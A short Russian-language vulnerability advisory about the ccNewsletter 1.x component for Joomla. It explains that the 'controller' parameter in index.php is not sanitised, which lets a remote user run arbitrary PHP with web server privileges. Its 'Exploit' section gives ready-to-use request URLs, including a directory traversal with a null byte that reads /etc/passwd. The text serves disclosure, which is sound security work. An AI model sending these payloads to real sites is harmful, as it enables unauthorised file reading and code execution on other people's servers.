Программа: ccNewsletter 1.x (component for Joomla)

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP
сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки
входных данных в параметре "controller" сценарием index.php (когда "option"
установлен в "com_ccnewsletter"). Удаленный пользователь может выполнить
произвольный PHP сценарий на целевой системе с привилегиями Web сервера.

Эксплоит:

http://server/[JOOMLA_PATH]/index.php?option= com_ccnewsletter&view=ccnewsletter&Itemid=87&controller=[-DT-]
http://server/index.php?option=com_ccnewsletter&controller=[LFI]
http://server/index.php?option=com_ccnewsletter&controller=../../../../../../../../../../etc/passwd%00

Оставить мнение